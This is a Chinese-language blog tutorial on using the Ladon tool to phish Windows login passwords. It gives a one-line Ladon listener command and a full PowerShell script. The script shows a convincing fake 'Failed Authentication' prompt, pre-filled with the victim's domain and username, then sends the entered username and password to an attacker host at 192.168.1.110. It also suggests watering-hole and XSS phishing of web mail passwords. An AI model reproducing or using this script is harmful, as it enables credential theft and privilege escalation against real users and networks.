logo

K8哥哥

没有绝对安全的系统

〖教程〗使用Ladon捕获Windonws登陆密码

=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

版本

>= Ladon 6.6.3
Update: 20200618

原理

使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。

应用场景

域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)

Ladon监听

该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html

1
Ladon Web 800

image

PowerShell

执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
Add-Type @'
using System;
public class Authorization
{
public static void submit(string usr,string pwd)
{
string url = "http://192.168.1.110:8000/";
System.Net.HttpWebRequest myReq = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
string username = usr;
string password = pwd;
string usernamePassword = username + ":" + password;
System.Net.CredentialCache mycache = new System.Net.CredentialCache();
mycache.Add(new Uri(url), "Basic", new System.Net.NetworkCredential(username, password));
myReq.Credentials = mycache;
myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new System.Text.ASCIIEncoding().GetBytes(usernamePassword)));
System.Net.WebResponse wr = myReq.GetResponse();
}}
'@
[Authorization]::submit($cred.username, $cred.getnetworkcredential().password)

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

扫码加入K8小密圈